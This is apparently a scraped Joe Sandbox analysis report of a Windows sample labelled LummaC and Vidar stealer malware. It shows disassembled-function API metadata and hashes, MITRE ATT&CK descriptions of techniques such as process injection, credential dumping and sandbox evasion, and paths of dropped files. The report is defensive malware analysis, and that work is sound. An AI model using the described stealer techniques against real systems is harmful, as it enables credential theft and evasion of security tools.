malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C0CFF2A), ref: 6C0DE04A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C0CFF2A), ref: 6C0DE0C0
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C0CFF2A), ref: 6C0DE0FE

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e1ee2797a191db6fb806ffe9800c66afdb35083c3aae5a6f557aecc8a16cd69b
Instruction ID: f4146e575a0404ccbc51f53aa8b56ea853c433def8b491034b4bad8b4b7cbfe6
Opcode Fuzzy Hash: e1ee2797a191db6fb806ffe9800c66afdb35083c3aae5a6f557aecc8a16cd69b
Instruction Fuzzy Hash: BA41B1B57043168FEB14CF68D89035ABBF2AB45708F164939D626DBB40E731F944CBA2

Function 6C0E6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C0E61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C0E622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C0E6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0E6292

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 0b17c18c70aa1d9b749e0787ee4b7f507bfce630a4f7ec099bc9171da0be0ef2
Instruction ID: efa8377f934fb3f46dd220aa2496e0ec49d10e4f3c5da8c4e2fef0c5f5c29b1f
Opcode Fuzzy Hash: 0b17c18c70aa1d9b749e0787ee4b7f507bfce630a4f7ec099bc9171da0be0ef2
Instruction Fuzzy Hash: AE310A71A0090A8FDB04CF2CE8807AA73E9FB59308F10453DC65AD7651EB31E558CB51

Function 6C0D6E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C0D6EAB
memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C0D6EFA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C0D6F1E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D6F5C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 6577329a74b865bb35c8c9c55bbcd2115cf60c82b5de3a6bac95956b77329c56
Instruction ID: c5fa31e2ed46852b5fbcc2cbb903329f3311db60fec1cb8849fb17019888dce5
Opcode Fuzzy Hash: 6577329a74b865bb35c8c9c55bbcd2115cf60c82b5de3a6bac95956b77329c56
Instruction Fuzzy Hash: 8931E471A1060A8FEB04CF2CC9807AA73E9EB85344F51863DD41AC7655EF31E659CBA1

Function 6C0EB580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C090A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0EB5EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C090A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0EB623
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C090A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0EB66C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6C090A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0EB67F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: malloc$free
String ID:
API String ID: 1480856625-0
Opcode ID: 9ef381f0b21eca03c2203622f40bf59544d40396ba7c47f751d9270daa323d2a
Instruction ID: ca9aaf21761533472da4429c7ec84434c772dda022e62977461123d613bfcf69
Opcode Fuzzy Hash: 9ef381f0b21eca03c2203622f40bf59544d40396ba7c47f751d9270daa323d2a
Instruction Fuzzy Hash: F431F271A013168FEB10CF58C84475ABBFAFFC8304F168629C8069B205EB35E915CBE5

Function 6C0BF5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0BF611
memcpy.VCRUNTIME140(?,?,?), ref: 6C0BF623
memcpy.VCRUNTIME140(?,?,00010000), ref: 6C0BF652
memcpy.VCRUNTIME140(?,?,?), ref: 6C0BF668

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction ID: 907cf62ce8c813b1bd9b1bca411410b6c41684b53160838b91385da8ef686fb7
Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
Instruction Fuzzy Hash: F7315E79A00214AFC724CF1DCDC0B9E77F9EB84354B148538EA498BB09D672F9858B90

Function 6C0839A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E744,6C0E7765,00000000,6C0E7765,?,6C0A6112), ref: 6C0839AF
LeaveCriticalSection.KERNEL32(6C10E744,?,6C0A6112), ref: 6C083A34
EnterCriticalSection.KERNEL32(6C10E784,6C0A6112), ref: 6C083A4B
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C083A5F

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 103f6a2ded1df4b0a57e1cd0d0cbd506d811f866bff112bca43020425a303960
Instruction ID: 7b0c8fbb9980df2aa385e2f8f1491cd3d20f97dc5e0eeb6086b69ca44486be58
Opcode Fuzzy Hash: 103f6a2ded1df4b0a57e1cd0d0cbd506d811f866bff112bca43020425a303960
Instruction Fuzzy Hash: 1B21F732702B014FCB25DF6AC445B6A73F1EF89714728491EC9A593F40DF71A9059BD1

Function 6C09B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C09B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6C09B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C09B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09B9B9

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 6c447714643bf1a74ebfac6e7a0ae64ff089423841a6b16731dc6ae434ac6ccf
Instruction ID: 10be2a3dae092b5f9e156e3f319518387cf5bf7fa9022fdf66452cca540fcfcf
Opcode Fuzzy Hash: 6c447714643bf1a74ebfac6e7a0ae64ff089423841a6b16731dc6ae434ac6ccf
Instruction Fuzzy Hash: AA1181B1A002059FCB14DF6DD8809ABB7F8FF88314B14853AE919D3701D771E915CBA1

Function 6C0D26B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D26C1
free.MOZGLUE(?), ref: 6C0D26E4
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D26FF
free.MOZGLUE ref: 6C0D270D

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 328b872748b852123567fd3928f77513186c63d2c035b03e254b3012829b666e
Instruction ID: d0d4a6b5e2379035be12470d1122c7b6d0daf8e3a463f589a225bcf037c53ec0
Opcode Fuzzy Hash: 328b872748b852123567fd3928f77513186c63d2c035b03e254b3012829b666e
Instruction Fuzzy Hash: 01F0F4B67013005BE7109A98E888B4BB3EDFF41218B124035FA1AC3B02E731FD19C6A2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\DHIECGCAEBFI\AFHDBG

C:\ProgramData\DHIECGCAEBFI\ECFHIJ

C:\ProgramData\DHIECGCAEBFI\KJDGDB

C:\ProgramData\FBFHJJJDAF.exe

C:\ProgramData\FIEHIIIJDA.exe

C:\ProgramData\IIDHJDGCGDAA\AKEGII

C:\ProgramData\IIDHJDGCGDAA\AKJDGI

C:\ProgramData\IIDHJDGCGDAA\CBFIJE

C:\ProgramData\IIDHJDGCGDAA\DGCAAA

C:\ProgramData\IIDHJDGCGDAA\EGIDHD

Windows Analysis Report
file.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre